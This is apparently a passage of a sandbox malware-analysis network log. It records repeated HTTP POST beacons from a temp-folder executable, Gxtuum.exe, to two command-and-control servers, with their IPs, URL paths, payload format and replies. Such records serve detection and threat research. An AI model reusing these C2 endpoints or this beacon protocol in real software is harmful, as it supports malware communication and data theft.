Dec 13, 2024 07:47:56.764127970 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:58.126125097 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49788	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:59.863554001 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:01.203928947 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49789	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:59.895382881 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:01.236268044 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49791	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:02.827611923 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:04.193331957 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49792	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:02.858550072 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:04.221220970 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49803	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:05.943409920 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:07.283026934 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49804	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:05.969510078 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:07.314804077 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49810	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:08.906168938 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:10.268330097 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49811	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:08.952997923 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:10.289942980 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49817	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:12.017656088 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:13.361048937 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:12 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49818	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:12.032008886 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:13.377300978 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:12 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49829	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:14.985713005 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:16.362961054 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49830	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:15.000685930 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:16.362895012 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49836	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:18.112462997 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:19.447086096 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:18 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49837	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:18.113078117 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:19.454444885 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:18 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49846	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:21.079731941 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:22.439553976 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:21 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49847	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:21.080219984 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:22.440085888 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:21 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49855	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:24.194046974 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:25.533883095 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:24 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49856	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:24.195647955 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:25.533108950 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:24 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49862	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:27.159646034 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:28.517689943 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:27 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49863	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:27.159869909 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:28.518207073 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:27 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49875	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:30.268210888 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:31.617827892 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49874	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:30.268290043 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:31.617913961 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49881	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
